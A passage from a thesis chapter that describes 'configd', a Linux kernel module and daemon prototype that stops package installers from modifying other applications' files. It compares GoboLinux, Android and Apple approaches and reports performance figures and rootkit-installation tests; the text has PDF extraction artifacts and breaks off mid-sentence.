Application bundles are similar to packages as discussed above with two keydifferences. The first is that all file-system objects in the bundle will be in-stalled into the same sub-directory by the OS (akin to the approach used onAndroid described in Section The second is that scripts are not run bythe OS during install. Typically, application bundles are installed through adrag-and-drop style copy operation. Commonly distributed as disk images, ap-plication bundles greatly increase the security of the system against maliciousapplication installers. Unfortunately, Apple still supports a second approachfor installing applications and relies on the software developer to choose be-tween them. The malicious developer is unlikely to distribute his software as abundle when distributing a package (see below) is possible. Legitimate applica-tions are distributed as both bundles (e.g., Mozilla Firefox) and packages (e.g.,Adobe Flash).
While application bundles remove the ability for many applications to obtain
root privileges, they do not mitigate the entire threat. Any application whichobtains root privileges (maliciously or otherwise), even if installed as a bundle,can still modify any file on the system.
Application Packages in Mac OS X
For more complex applications, additional actions (other than simply copyingthe files into the application directory) may need to be performed by the in-staller during the install process. For these applications, Apple provides anapplication package framework as discussed in Section
The status quo across multiple operating systems is to "restrict" installers
by requiring the user authorize an installation by entering an administratorpassword before the installer can run. Once the installer is given "blind" full
Chapter 6. Configd
permission to the system, the user must trust that the installer does not abuseits privilege (since it is difficult to tell what the installer actually does with itsroot privilege – thus we call it blind trust).
Approaches for Encapsulating Applications
In this section, we discuss several approaches for encapsulating applications,using the definition of encapsulation from page While we choose to imple-ment the GoboLinux approach in configd (as discussed later in this chapter),the alternative approaches discussed in this section are equally viable. Wesummarize the three approaches in Table Note that although Table indicates that for GoboLinux, application upgrades are not supported, the useof the GoboLinux approach in configd is done in such a way that applicationupgrades are supported.
Apple App Store
Application Upgrades
Allows Install Scripts
Application Deployment
Table 6.1. Characteristics of current systems which encapsulate applicationson disk.
In GoboLinux (version 014.01) each application is installed into itsown directory (similar to Android). The actual install of a program is donethrough calling three scripts. PrepareProgram is responsible for creating thebase directory where the program will be installed. CompileProgram takes acompressed archive of the program source, configures it with the appropriateflags so it will be installed into the directory prepared for it by PrepareProgram,compiles the program, and installs it. SymlinkProgram creates symbolic linksto the various program binaries, libraries, and settings. For backwards com-patibility, the common Unix directories (e.g., /usr/bin, /sbin, and /lib) arealso linked to /System/Links, which is in turn populated with symbolic linksfor each of the applications that have been installed. To decrease the ability ofan application to escape its assigned application directory, the make install
6.2. Approaches for Encapsulating Applications
command is run under a special user ID This user is only allowed tomodify files under two directories: the one in which the application is beinginstalled to, and the one it was compiled from In restricting an ap-plication during both compile and install, the other applications on the systemremain protected against modification.
For those applications which are not complete programs in themselves but
instead extensions to other applications which are already on the system (e.g.,the PHP module is often installed as an extension to the web server Apache),the base application needs to be made aware of the extension. In GoboLinux,the configuration of each application is stored in the shared tree /System/Settings/.
All files in this directory are symbolic links that point back to
the settings folder, which is a sub-directory of where the application was in-stalled. The base application provides a directory under /System/Settingswhere a module can register itself (through SymlinkProgram). Many distribu-tions other than GoboLinux have also adopted this as the method of installingextensions into a base application (although the exact path to the configura-tion will change). Another related example involves services which should bestarted on system boot. On Debian based distributions, the accepted locationfor a script responsible for starting a service is in the directory /etc/init.d.
GoboLinux places scripts responsible for starting the various system servicesin /System/Links/Tasks.
GoboLinux depends heavily on symbolic links being placed into the above
mentioned standard directories for extensions to applications. The base Gob-oLinux executable SymlinkProgram is responsible for updating this directorytree based on the layout of files in any particular application directory (Gob-oLinux does not allow application installers to directly modify the symbolic linksin shared directories).
A limitation of GoboLinux is that it does not cleanly support upgrades (or
security patches) to an application. Each upgrade is treated as an install of anew version of the application, resulting in each version being installed into itsown directory on disk. The job of sorting out which version of an applicationshould be used by default on a system is left to SymlinkProgram (the PATH en-vironment variable is set to point to /System/Links/Executables, a directorymaintained by SymlinkProgram). The sharing of configuration files between dif-ferent versions of an application is left up to the individual application. Indeed,each version of an application has its own copy of the configuration files storedin a Settings sub-directory of the application directory, alongside the varioussub-directories for each version of the application which is installed.
While we choose in this thesis to maintain the current file-system hierarchy,
negating the need for symbolic links, changing the file-system hierarchy and
Chapter 6. Configd
incorporating the functionality of SymlinkProgram into configd is another ap-proach which can be used to encapsulate applications. The approach used byCompileProgram, where associated installation scripts are run with permissionto write only to files directly associated with the same application, restrictsinstallation scripts while still allowing them to exist. We discuss an implemen-tation of this approach in configd in Section
On the Android (version 2.0) platform each application package is as-signed its own directory and unique user id. While Android uses the Linuxkernel as its base, being a single user platform, Android remapped the tra-ditional user accounts to restrict communication between applications. TheAndroid application installer ensures that each application is restricted to mak-ing file-system modifications in the directory it was installed into. Unlike thefile-system hierarchy standard as used on Linux, there are no shared di-rectories for storing binaries, libraries, configuration files, and other elements.
Android benefits greatly from the ability to mandate a file-system layout whichrestricts each application to single sub-directory on the file-system.
The Android (version 2.0) platform only allows a new version of an appli-
cation to be installed over top of the old if all public keys in the new versionare also contained in the old version already installed (new keys cannot cur-rently be introduced during an upgrade). During the install of an application,the application itself is not given a chance to run any installer scripts as admin-istrator – greatly restricting the damage a particular application can do to filesbelonging to other applications. The platform does a good job of preventing oneapplication from modifying another's files.
With additional work, the Android approach can be adapted to the standard
Linux file-system hierarchy Instead of storing all files related to an appli-cation in a single directory, a database could be maintained which maps eachindividual file to the application it is associated with (the Debian package man-ager already keeps such information), as well as a list of public keys which areused to verify the next version of the package. The Android approach does notsupport scripts being run as part of the installation process (similar to Applebundles not supporting scripts; see Section Combining the Android ap-proach with GoboLinux, however, allows the execution of installation scriptswhich can modify the configuration of the application being installed while stillpreventing other applications from being modified.
6.3. The Protection Mechanism
Apple Application Bundles
While the general application bundle is discussed in Section a number ofrestrictions were made by Apple for bundled applications targeting iPhones (upto those released in January 2010) The biggest change is that each appli-cation installed onto the iPhone is limited to making file-system modificationsonly in the directory it was installed into. This includes limiting an applicationto reading and writing data files to an application specific area of the file-system(similar to Android).
In contrast to Android, Apple application bundles targeted to the iPhone
are not signed with the key of the software developer. Instead, each applica-tion must be signed by Apple before it can be run on an iPhone (we ignore"jail-broken" iPhones in our discussion). Before signing an iPhone applicationbundle, Apple examines the application to ensure it meets their criteria Forapplication bundles designed for Mac OS X, Apple has no such restriction thatthe bundle be verified and signed by Apple before it can be installed.
The Protection Mechanism
Our main objective in this chapter is to divide root privilege so that programs,such as installers, cannot take advantage of overly coarse access controls toabuse the privileges they have been given. The design of our approach is sub-ject to several self-imposed constraints. We believe that, to be viable, any al-ternate approach for restricting file-system privileges on the desktop at a per-application level would need to fulfil the following considerations.
1.
Compatibility with current file-system layouts. In designing a Linux-
based prototype of the proposal, our goal was to avoid requiring redesignof the current file-system hierarchy in favour of a solution compati-ble with the current file-system layout. Applications are encapsulated, be-ing protected against modification while retaining the current file-systemlayout – installing files to directories shared with other applications. Incontrast, GoboLinux and Apple (in Mac OS X) did redesign the file-system hierarchy. Their motivations were apparently to impose cleanli-ness in restricting each application to its own directory. While the sep-aration of each application into its own directory may simplify the chal-lenge of restricting configuration changes on a per-application basis, abackwards compatibility layer is still required to support applications notdesigned for the new layout.
Chapter 6. Configd
2.
Minimal impact on day-to-day operations. Most of the time, a com-
puter is used to perform day-to-day tasks (run applications) with a con-stant configuration of the applications and operating system. Occasionally,its configuration is modified in order to expand/modify the tasks it can per-form (e.g., applications are installed, updated, removed, or reconfigured).
Our proposal (and indeed any alternate configd approach) should imposeno noticeable impact on such day-to-day operations, with no changes toregular user work flow.
3.
Backwards compatibility for current installers. We introduce new
restrictions on an application's ability to modify file-system objects. Theserestrictions will typically influence the install, upgrade, and removal ofapplications. It is unrealistic to assume that all installers will be modifiedin parallel during deployment of such a solution. Backwards compatibilityis therefore critical for incremental deployability.
In the prototype, to ensure that all file-system operations modifying con-figuration related files are handled by configd, a kernel security modulewas written which redirects all requests for modification to configurationrelated file-system objects to configd for verification. Any application notwritten explicitly to communicate with configd, including all scripts runas part of an application install, would have their file-system operationsrerouted. In addition to implementing a backward compatibility layer, theprototype uses a modified package installer for Debian – compatibility wasmaintained with standard Debian packages. We foresee any alternate useof the control point provided by configd as also having to support cur-rent install methods (subject to the constraint that the installer does notattempt to break the per-application encapsulation restrictions).
4.
Usability. Our focus in this thesis is on providing a solution which can be
used by non-expert users, and to avoid forcing upon users choices whichthey are ill-equipped to respond to correctly. Our solution achieves thisgoal, allowing an applications' file-system objects to be protected againstmodification during install, upgrade, uninstall, and at run-time, withoutpresenting the user with complex choices. While our prototype solutiondid leave enabled the option of querying the user about file-system opera-tions, this feature can be safely disabled (as discussed in Section
5.
Other considerations. We assume that the user of a computer system
can be trusted to not be malicious. The proposal, therefore, does not pro-tect against physical attacks, such as rebooting into a kernel that does
6.3. The Protection Mechanism
not enforce the proposed protection Its security also as-sumes that applications cannot obtain kernel level control of the although on most current systems, any application running with root ac-cess can modify the running kernel. This assumption therefore relies onthe mechanism presented in Chapter to be in place.
A Division of Root Privileges
To build a system designed to reduce root abuse of file-system privileges, wefirst separate configuration related activities (those configuration actions af-fecting the applications installed or their global configuration as stored on disk).
We then further subdivide the configuration privilege to remove the ability of anapplication installer to modify any file-system object other than those which arepart of the application being installed (or upgraded/removed). While Chapterfocused on enforcing additional protection mechanisms on binary files usingbin-locking, we now focus on enforcing additional protection mechanisms onall types of configuration related files (through the use of configd), not justapplication binaries.
Our prototype design consists of two main elements: a kernel extension and
a user-space daemon. The user-space daemon is responsible for the bulk ofthe work, namely, ensuring that one application cannot modify files related to adifferent application. The kernel is responsible for denying (or forwarding) re-quests to modify protected file-system objects, by which we mean files (includ-ing binaries), directories, symbolic links, and other objects that are part of thefile-system. Protected file-system objects (which we call c-locked file-systemobjects, short for configuration locked ) are designated (marked) as such bythe user-space daemon (an alternate method of protecting file-system objectsis by using a union file-system to redirect writes Any application file-system object marked as part of the system configuration (and hence to beprotected against modification by other applications) must be so designated.
While we leave open the exact set of c-locked file-system objects, we view theset to include shared libraries, executables, system configuration files, start-upscripts, and other file-system objects which do not change as a result of day-
2While some have proposed that the user cannot be trusted our work avoids
declaring the user as the enemy and preventing them from modifying their own system. Wefavour persuasive tactics as a tool to encourage users to properly maintain their system whilenot taking the control out of their hands.
3We define the kernel (and hence kernel level control) to include only those aspects running
with elevated CPU privileges (ring 0 privileges on x86); this definition does not include coresystem libraries installed alongside the OS but run in user-space.
Chapter 6. Configd
to-day system use. In effect, the system configuration on disk includes the setof applications installed as well as each application's files which are requiredat run time. Only a process holding a newly introduced configuration permis-sion is allowed to modify the system configuration on disk (and hence c-lockedfile-system objects).
The exact distribution of duties within our design has the kernel responsible
1. Restricting to programs running with configuration permission the abil-
ity to delete, move, and write to c-locked file-system objects. By design,"root" is not allowed to make arbitrary changes to c-locked file-systemobjects (including the kernel image) – changes are limited to processesrunning with configuration privilege.
2. Restricting the ability to obtain configuration permission. In our proto-
type, this is done by allowing only a single process, the configuration dae-mon (configd) to have configuration permission.
3. Restricting the ability to control the process running with configuration
permission (e.g., by not allowing configd to be killed or modified by adebugger).
In restricting configuration permission to a single daemon, we introduce achokepoint within which we can further subdivide file-system access by applica-We perform the actual subdivision in the above-mentioned configurationdaemon configd. It performs the following operations:
1. Respond to requests for configuration changes from processes running on
the system. In our prototype, requests were at the granularity of pack-age operations, but our design could be easily modified to handle othergranularities.
2. Designate file-system objects as c-locked. It marks a setting in a data
structure associated with the object to denote this designation. In ourprototype, every file installed when upgrading or installing a package ismarked as c-locked.
3. Perform authorized changes to the configuration of the system.
4While it is possible to use the kernel as the chokepoint, our preliminary exploration in this
direction suggested that implementing the functionality required to further subdivide root ona per-application basis directly in the kernel introduces functionality into the kernel which isalready available in user-space.
6.3. The Protection Mechanism
We now discuss in more detail how the two elements work together to re-
strict the ability for an application to modify file-system objects belonging toanother application.
Linux Kernel Protection of C-Locked File-System
Objects
How a kernel handles file-system objects can directly affect the security of c-locking. In the Linux kernel, the key file-system data structures directly relatedto the protection of file-system objects by configd are the directory entry (ordentry) and inode The inode data structure contains most of the informa-tion related to the file data and meta data (e.g., the traditional Unix file-systempermissions read, write, and execute) and pointers to the actual blocks on diskwhich hold the file contents. The dentry contains information related to thespecific instance of a file in a particular directory, including the name of thefile (as it appears in that directory) and a pointer to the inode. For the pur-poses of c-locking, the dentry inherits the c-locked status of the inode. If theinode is marked as c-locked, then the directory entry can be deleted or movedonly by configd. File operations on an inode which is not c-locked are re-stricted through current access-control restrictions (including traditional Unixfile permissions). Figure demonstrates the relationship between inodes anddentries.
Symbolic Links. Symbolic links are directory entries in Linux pointing to
an inode containing a path string. When opening a symbolic link, the kernel re-trieves the path name from the symbolic link inode. It then follows the retrievedpath name to obtain another dentry and inode (which is either yet another sym-bolic link or some other element such as a file or directory). The proposedsystem supports either c-locking the symbolic link, the object it points to, orboth.
Hard Links. A hard link is a directory entry in Linux pointing to the same
inode as another directory entry. As with regular files, because the inode itselfcontains the c-lock flag, any hard link pointing to the inode inherits the c-lockedattribute associated with the inode. An attacker does not gain modificationprivilege by creating a hard link to a file-system object protected by c-locking.
The ability to create a hard link to a c-locked file is restricted, being eitherallowed or denied by configd.
Directories. A directory is an inode which instead of pointing to file data,
points to a list of dentries. While previous approaches focused on pro-tecting files more than directories, there are cases in which a directory should
Chapter 6. Configd
Figure 6.3. File-system data-structure layout including new c-lock flag.
be protected. As an example, during start-up the Debian /etc/rcS.d directoryis accessed and every file (or file pointed to by a symbolic link) in this directoryis run. Any malware installed into this directory would be started automaticallyduring system boot. The proposed system can protect directories since theycan be c-locked in the same manner as files and symbolic links.
The prototype configd is designed to subdivide root file-system permissions ona per-application basis. In our framework, configd, or its equivalent, becomes achokepoint which applications must use in order to modify c-locked file-systemobjects (and hence the configuration of the system). This is illustrated in FigureTo enforce that configd is the only way that c-locked file-system objectscan be modified, the kernel grants the new configuration permission to configdalone. By delegating this privilege to configd, the kernel need not know aboutevery application on the system or what file belongs to which application; it
6.3. The Protection Mechanism
need only recognize that a specific file is c-locked and leave the handling of thisfile to configd. The rules enforced by configd, in turn, are designed to be setby a guardian, during development of configd.
Figure 6.4. An illustration of configd as a chokepoint. Applications can con-tinue to read and write to user files, but can only read from configuration relatedfiles.
configd must be started early during the boot process (configd itself re-
stricts changes to the boot process). Once configd has started, other programsare prevented by the OS kernel from obtaining configuration permission. Thedesign of configd takes advantage of the temporal nature of software installs.
At the time of installation of application software, it is assumed that the operat-ing system and configd are already installed and running. This assumption isreasonable if configd is made part of the OS or core system.
Example Configd Rule Set
While the core configd approach can use any number of different protectionmechanisms for separating files on a per-application basis, we chose to dependon Debian packages (and indeed, the package manager – dpkg) in our solution.
Because we used Debian as the base system in which to implement c-locking,the safe operations performed by the prototype are customized to that environ-ment (e.g., we use the same file extensions as dpkg).
In Debian, the sequence of operations performed by the Debian package
manager (dpkg) when installing any new file (during the install or upgrade of apackage) is:
1. Create a backup of file-system object A by hard linking A.dpkg-tmp to the
same inode as A.
Chapter 6. Configd
2. Extract the new file which will replace A into A.dpkg-new. If the new
file-system object being installed is a hard link, instead create a hard linkcalled A.dpkg-new.
3. Move A.dpkg-new to A.
4. Remove A.dpkg-tmp.
Under the assumption that the kernel enforces c-locking according to a flag setin the inode, the following operations related to modifying c-locked file-systemobjects are allowed by the prototype. We have determined that these rules donot allow one application to arbitrarily modify file-system objects associatedwith another application, and hence can be considered "safe."
1. If A is a c-locked file-system object that does not end in .dpkg-tmp, then
creating a hard link A.dpkg-tmp that points to the same inode as thatpointed to by A is allowed.
2. Any c-locked file-system object ending in .dpkg-tmp may be deleted. Dur-
ing prototyping, it was determined that no permanent file-system objectshave names that end in .dpkg-tmp and hence this operation does not allowa permanent file associated with an application to be deleted.
3. If A is a c-locked file and A.dpkg-tmp is hard linked to the same inode as
B, then creating a file B.dpkg-new that is hard linked to the same inode asA is allowed.
4. If A is a c-locked file-system object whose contents under a cryptographic
hash have the same value as A.dpkg-new, then A.dpkg-new can replaceA (i.e., if A and A.dpkg-new contain the same data). We do not mandateany specific cryptographic hash algorithm, other than to stipulate that, atminimum, it must have second pre-image resistance (our configdprototype currently supports SHA-1 and can be easily expanded to supportothers).
5. If A is a c-locked file containing one or more public keys and A.dpkg-new
is another file containing a digital signature verified by using a public keyin A, then A.dpkg-new is allowed to replace A.
6. If c-locked file A is associated with package PKG and is not associated with
any other package installed on the system, then when upgrading packagePKG, A may be modified.
6.3. The Protection Mechanism
7. If c-locked file A is associated with package PKG and is not associated with
any other package installed on the system, then install scripts associatedwith package PKG may modify A.
8. All other operations involving a c-locked file are considered to be poten-
tially dangerous. They can either be presented to an expert user for addi-tional oversight, or simply denied (as discussed in Section
Of the "safe" rules, some merit further discussion. Rule was created as
a result of the way two files that are hard linked together are updated by theDebian package manager. For this rule to apply, A and B would need to havebeen linked together (and subsequently A.dpkg-tmp created through rule They must have been part of the same package (rule or (if enabled) the usermust have allowed A.dpkg-tmp to be hard linked to B (rule Rule limitshard linking to files distributed in the same package.
Rule adapts concepts used by the Android OS but to the file (as in
Chapter as opposed to package level. The rule relies upon the use of publickeys and signatures, but does not rely on a PKI.
Rule allows the modification of all files associated with a package when a
new version of the package is installed. The rule requires that configd keeptrack of packages installed on the system, as well as which files are associatedwith which packages. We discuss the semantics of how our prototype handledpackages in Section It is important to note, however, that a packagecannot modify any file on the system simply by asserting ownership of the file(through including the file in the list of files the package is associated with). Anyfile that is listed as belonging to more than one package cannot be arbitrarilymodified by any package. The option still exists, however, for a file associatedwith more than one package to be updated through rule
Rule restricts, through exclusion, the files that an install script can modify.
The rule is borrowed from GoboLinux and discussed in more detail inSection
Our testing confirmed that the above rule set allows upgrade operations
performed by dpkg to be automatically allowed. While the option of queryingthe user with remaining operations was left enabled in the prototype, we foundin testing that during upgrades, the user is not queried at all (see Section
While the approach discussed in this chapter must be enforced during everypackage install, upgrade, and uninstall in order to protect other application's
Chapter 6. Configd
file-system objects, the approach does not need to be installed on all systemssimultaneously in order for benefits to be realized. Systems choosing to imple-ment configd and enforce restrictions on c-locked files will immediately realizethe benefits of application encapsulation.
A Prototype Implementation
To support c-locked file-system objects, we used the extended attributes func-tionality of file-systems such as ext3 and XFS. This is the same approachused by SELinux In so doing, the underlying file-system-specific datastructures do not need to be modified. The extended attributes are tied to theinode. We used the trusted extended attribute name space because it sup-ported setting extended attributes on symbolic links. We created our c-lockingprotection mechanism as a Linux Security Module The kernel im-plementation was approximately 2200 lines of code, including the backwardcompatibility layer. A new device node was used as the interface between theuser-space configd and the modified kernel, allowing communication betweenthe two. The process of opening the device node initiated c-locking protectionin the modified kernel. The kernel understands and responds to several com-mands sent by the user-space configd through the new device node including:
•
release. Because our kernel allows only a single process to obtain config-
uration privileges at a time, this command was included to allow configdto be stopped, upgraded and started during testing. On a production sys-tem, this command can be safely disabled.
•
freeze. Freeze all processes on the system except for configd, to prevent
race conditions as configd performs file-system changes. It also preventsprocesses from interfering with the user interface in our prototype (seeSection
•
thaw. Unfreeze all frozen processes on the system, allowing them to con-
tinue executing.
•
noraw and
raw. Disable/enable raw write access on the hard drive device
denoted by the associated options major and minor. This was used toprevent applications bypassing configd by writing to the underlying harddrive sectors associated with c-locked file-system objects.
6.4. A Prototype Implementation
The kernel also sends several commands to the user-space daemon configd,
•
plugin. A USB token containing a magic value associated with configd
has been inserted. The kernel is responsible for disallowing write accessto the partition containing the magic value – on machines with configdenabled, only configd is allowed to write to the partition containing themagic value. We discuss the use of USB tokens more in Section
•
remove. A USB token containing a magic value associated with configd
has been removed.
To prevent applications from being able to modify c-locked file-system ob-
jects through modification of the kernel, the protection mechanism of Chapterwas implemented.
Because we implemented the backwards compatibility layer in the kernel (see
Section the kernel security module was extended to additionally send the
pipe command to configd.
pipe requests authorization from configd on re-
quests received by the kernel to perform operations on c-locked file-system
objects (i.e., the requests were not sent directly to configd by the application).
The requests forwarded to configd by the kernel are move, delete, link, and
symlink. Configd is responsible for performing permission checks on the re-
quest as if it came from some other user-space process. The id number of the
request is sent back to the kernel through the use of the new command
id. The
response to the command is sent back to the kernel through the use of the new
commands
done, fail, queued and
unknown, which are accompanied by an
id number previously returned to the kernel by the
id command. If the kernel
receives a
done response, it allows the application to perform the operation,
otherwise the operation is denied. Other responses that can be received from
configd indicate that the request has been rejected (failed ), queued awaiting
the user to insert a USB token (queued ), or has failed to process due to some
other error (unknown).
The configd prototype is a 12,500 line C++ application. While the primarypurpose of writing configd is to encapsulate applications on disk, during thecourse of development several additional features were added. These include:
Chapter 6. Configd
1.
A mounting module which can decide whether a request to mount a file-
system should be performed (it performs the operation, if allowed). Toensure that c-locked file-system objects remain accessible by applicationsthey are associated with, we must ensure that a new file-system cannot bemounted over top of c-locked file-system objects. Configd does this by ex-amining the trusted.configd.nomount file-system extended attribute. Fordirectories which should not be mounted over (e.g. /usr), this extendedattribute should be set on the directory inode. The mounting module alsoinforms the kernel through the configd device node that requests to writeto the underlying raw hard drive sectors should be denied, since allowingsuch requests would undermine the security of both c-locking and per-application restrictions enforced by configd.
2.
A modprobe module which handles requests for the insertion or re-
moval of kernel modules. In order to ensure that configd remains thechokepoint for restricting file-system objects on a per-application basis,root must not be allowed to install arbitrary code into the running kernel.
While the prototype version of this module currently accepts all requests,kernel module loading can be easily restricted based on a number of cri-teria, including whether the module is signed with a recognizable key (such an approach would not require a complete PKI infrastructure).
Debian Package Manager Modifications
Because the Debian package manager (dpkg) is responsible for performing mostconfiguration changes on a system, we integrated dpkg with configd. Whileother methods of restricting configuration changes at a per-application levelmay choose to totally replace dpkg, augmenting dpkg to communicate withconfigd was suitable for our prototype (configd had the final say as to whetherall requests for operations on c-locked files received from either the kernel ordpkg are allowed). The modified dpkg informed configd about each packagewhich was being installed or upgraded, and also marked as c-locked every fileinstalled when upgrading or installing a package, regardless of whether the filewas previously c-locked.
The Debian package manager also keeps track of which files are associated
with which packages. While we have not utilized it in our prototype imple-mentation, this tie between files and packages can be used in other protectionmechanisms which restrict configuration changes on a per-application level.
We discuss several such approaches in Section Because it is consideredan error on Debian to have a file belonging to two unrelated packages
6.4. A Prototype Implementation
Debian's package approach lends itself nicely to a clean separation betweenapplications.
In our prototype, the Debian package manager and surrounding infrastruc-
ture was responsible for preventing one application from assuming the nameof another (and hence being able to modify the files associated with the secondpackage). Such an approach depends on the security of the packaging systemin Debian, which although reasonably secure against intrusion, is not perfectTo reduce the dependence on Debian to keep packages from replacingother un-related packages in the archive, bin-locking (as discussed in Chaptercan be applied at the package level (as discussed in Section and A package is typically signed with a private key held by the developer. Any newversion of that package is allowed to replace the installed one if it is signedwith a private key verifiable with the corresponding public key contained in thecurrently installed package. In this way, application updates are restricted tothose software authors holding the private signing key. Unless two applicationsare written by the same developer, and assuming that private keys are not gen-erally shared between developers, the two applications are unlikely to have anyidentical keys and hence will not be able to modify each other. In using this ap-proach for Debian packages, we can eliminate the risks associated with relyingon the Debian packaging team to properly keep packages distinct
Allowing Scripts During Package Install
In Section rule states that if c-locked file A is associated with packagePKG and is not associated with any other package installed on the system, theninstall scripts associated with package PKG may modify A. In order to enforcethat an install script contained in a package may only modify files on the sys-tem associated with that package (and no other package), we implemented anability to run install scripts within configd. The approach closely parallels theapproach used by GoboLinux for installing applications (see Section Thefollowing procedure was followed for running install scripts:
1. An unused user ID (UID) is allocated by configd. While configd examined
/etc/passwd in our prototype, different methods may be required whenusing alternate approaches for user account control.
2. For each file associated with package PKG (and not associated with any
other package installed on the system), the owner of the file is recordedby configd and then changed to UID.
Chapter 6. Configd
3. The script is run as user UID by configd. In running the script as a user
who only has permission to modify files associated with the package, otherapplications on the system are protected by the standard access controlson the system.
4. For each file associated with the package PKG, the UID is changed back
to the value stored in step unless the user owning the file has beenchanged by the script.
5. The UID allocated in step is freed.
The approach allows an install script associated with package PKG to modify
any file associated with the same package, but does not allow the install scriptto modify any file associated with any other package installed on the system.
It achieves the design goal of restricting file-system modifications such thatone application can not modify the file-system objects associated with anotherapplication installed on the system. Indeed, simply implementing the approachinto dpkg without fully implementing configd has benefits over the currentapproach of allowing unrestricted access to the file-system by install scripts.
In Linux, ldconfig is responsible for configuring the dynamic linker run-
time bindings During testing of our prototype, scripts occasionally ranldconfig, which in turn attempted to update /etc/ld.so.cache. This presentsa problem, as /etc/ld.so.cache is not associated with the same package asthe script, and hence modifications to the file will be denied. To compensatefor this, configd runs ldconfig after the script completes with a UID that onlyhas permission to write to /etc/ld.so.cache. Our prototype currently doesnot support the updating of symbolic links by ldconfig, relying on the packagebeing installed to install the correct symbolic links. Should this become anissue in the future, configd can be updated to create symbolic links, similar toGoboLinux's SymlinkProgram (see Section
The use of would provide a more comprehensive approach for al-
lowing installation scripts to execute while not exposing the system to arbitraryfile-system modifications. Using fakeroot allows configd to better emulate thepermissions currently given to an install script without configd running. In theLinux environment, fakeroot is a program commonly used to make an appli-cation believe it has root privileges. The operations performed while runningunder fakeroot are recorded, and can be processed by configd with the goalof being able to replay the allowed operations later. This approach of recordingoperations and replaying them later is currently used when creating a distribu-tion package from a source archive. A similar approach has also been used inother secure software installation systems
6.5. Evaluation of Prototype
Handling of Operations not Automatically Allowed
While the prototype left enabled the option of querying the user for operationsnot allowed by other rules discussed in Section we believe that this rulecan be disabled when deploying configd to non-expert user systems, causingconfigd to reject of any file-system operation not allowed by the other rules.
During the process of applying security updates to all packages modified be-tween November 12th, 2009 and May 6th, 2010 (a total of ∼ 100 packages), wewere not queried by configd at all about modifications to the file-system.
USB Tokens
The prototype must prevent race conditions, as well as having malware inter-fere with configd's attempts to query the expert user about changes to c-lockedfile-system objects. The solution we adopted was to use a USB memory to-ken tied to configd (i.e., it contains a special partition which is recognized byconfigd). When the user wishes to authorize changes to one or more c-lockedfile-system objects, a recognized USB token is inserted. The kernel then sus-pends all processes other than configd to prevent race conditions and tamper-ing with the configd user interface. configd queries the user about any queuedc-locked change requests. In relying on the physical insertion of a hardware to-ken as a method to tie the user to a configuration change request, we borrowfrom the work of Butler et al.
Evaluation of Prototype
In this section, we evaluate the prototype implementation. We discuss its per-formance, resistance to current malware, and experiences with using the sys-tem.
To test the performance of our kernel modifications on file-system intensive day-to-day operations, we performed a complete compile of the Linux 2.6.31.5 ker-nel. We unpacked, configured (make allmodconfig), compiled, and removedthe directory tree containing the compiled kernel. We chose a kernel unzip,compile, and removal because of the number of required disk operations, heav-ily exercising the file-system as well as our prototype c-locking Linux securitymodule. We ran the test on two different 2.6.28.7 Linux kernels. The first test
Chapter 6. Configd
was with c-locking support not compiled in, and averaged 158 minutes and 52seconds over three runs. The second timing was performed with c-locking en-abled and configd running, and averaged 166 minutes and 34 seconds overthree runs. Both tests were run on the same Pentium 4 2.8GHz with 1Gb ofRAM. Over the three test runs, the average increased run time for the compilewith c-locking enforcement enabled was 4.8%. For day to day operations whichdo not involve heavy file-system activity, we expect the overhead of configdto be well under 4.8%. We also expect alternate implementations of configdfunctionality would produce comparable results.
Verification that Application Encapsulation is
Enforced
Malware frequently modifies file-system objects not directly associated with themalware itself (e.g., replacing ls). This provides an appropriate test case for theproposed restriction of configuration changes on a per-application basis duringinstall. Under the new root file-system restrictions, the test is to verify thatapplications (malicious or other) running with root privileges cannot modifyother applications file-system objects.
To test how well the mechanism presented in this chapter protects a system
when exposed to malware, we became root on a system with configd runningand kernel protections enabled. We then attempted to run six different Linuxrootkit Linux rootkits can be grouped into two categories: thosethat use some method to gain access to kernel memory, installing themselvesin the running kernel and then operating at kernel level, hiding their actionsfrom even root processes; and rootkits that replace core system binaries thatare often used by the root user in examining a system. Using the six representa-tive rootkits, we confirmed that the installer failed to gain access to the kernelbecause of disabled write access to /dev/kmem (which would otherwise under-mine configd), and that configd works as expected (i.e., file-system changespossible by malware are restricted to prevent other applications from beingmodified). That the rootkits failed to gain access to the kernel was verified byexamining errors returned by the rootkit installer when attempting the install.
The integrity of other applications file-system objects was verified through com-paring cryptographic hashes using Tripwire
We selected six representative Linux rootkits, two that modify the kernel
and four that replace system binaries. Both kernel-based rootkits (suckit2
6.5. Evaluation of Prototype
and mood-nt) failed to install because of disabled write access to /dev/kmem inthe prototype's modified kernel. The mood-nt kernel based rootkit which wetested also attempted to replace /bin/init. The attempt was denied by thebecause /bin/init is part of a different application on the system.
The four binary replacement rootkits (ARK 1.0.1, cb-r00tkit, dica, and LinuxRootkit 5) all resulted in file-system operations which were denied because theyattempted to either replace or delete core system binaries (e.g., ls, netstat,top, and ps). The core system binaries installed belong to applications otherthan the rootkits and hence changes to them by the rootkit installer were disal-lowed by our prototype.
Effects of Typical System Use
To test how well configd can be deployed on a pre-existing system, we in-troduced configd into a Debian desktop installation. We first installed an un-modified Debian Lenny (v5.0) distribution, including the KDE graphical desktopenvironment, onto a desktop. We then installed the configd daemon and mod-ified kernel, which enforces c-locked file-system restrictions. At this point, anypackage updates on the system (including installs, re-installs, and upgrades)would result in the associated files being marked c-locked, and hence protectedby configd. We then proceeded to re-install all packages that were alreadypresent on the system. In performing a re-install, all files associated with apackage became marked as c-locked and hence protected by the combinationof configd and the modified kernel.
Using this base system, where all package files are marked as c-locked,
configd is running, and kernel protections are enabled, we then proceeded todo further testing of the prototype using our desktop install. To test how wellthe configd prototype accommodates package upgrades, we installed all secu-rity updates made available for our desktop install between the days of Novem-ber 12th, 2009 and May 6th, 2010 (a total of ∼ 100 packages), we were notqueried by configd at all about modifications to the file-system, we did not seeany errors displayed during the upgrade process, and none of the packages ap-peared to be broken by the upgrades (i.e., the system still ran as expected). Totest how well the prototype configd accommodates re-installs, we reinstalledall packages on the desktop system (a total of 897 packages). Again, during theprocess we were not queried about changes to the system configuration, we didnot see any errors displayed during the process, and the system appeared to be
7In our prototype, the denial was performed by the prototype user, but would be performed
automatically if the user-interface is disabled. The rootkit install was not able to put up a fakeconfigd prompt because of protections discussed in Section
Chapter 6. Configd
fully functional after the reinstall (i.e., we could still log into KDE, browse theweb, read e-mail, and watch videos).
As a final test, we installed several (new) desktop applications (each consist-
